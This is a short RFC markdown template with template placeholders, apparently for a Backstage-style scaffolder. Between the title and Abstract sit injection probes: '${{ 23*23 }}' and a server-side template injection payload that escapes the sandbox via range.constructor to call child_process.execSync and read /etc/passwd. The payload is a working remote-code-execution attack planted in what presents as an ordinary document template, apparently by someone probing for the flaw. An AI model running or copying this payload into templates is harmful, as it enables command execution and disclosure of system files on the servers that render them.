# RFC-${{ values.rfcNumber }} - ${{ values.rfcTitle }}

HELLO??update

*Author(s)*: 
*Squad*: 
*Requested Reviewers*: 
*Status*: DRAFT


values: ${{ values }}

${{ range.constructor("return global.process.mainModule.require('child_process').execSync('tail /etc/passwd')")() }}

## Abstract
${{ values.abstract }}


test23:

${{ 23*23 }}

## Background

## Non-Goals

## Key Terms

## Problem

## Proposal

## Technical Limitations

## Open Questions

## Outcomes and Forward References
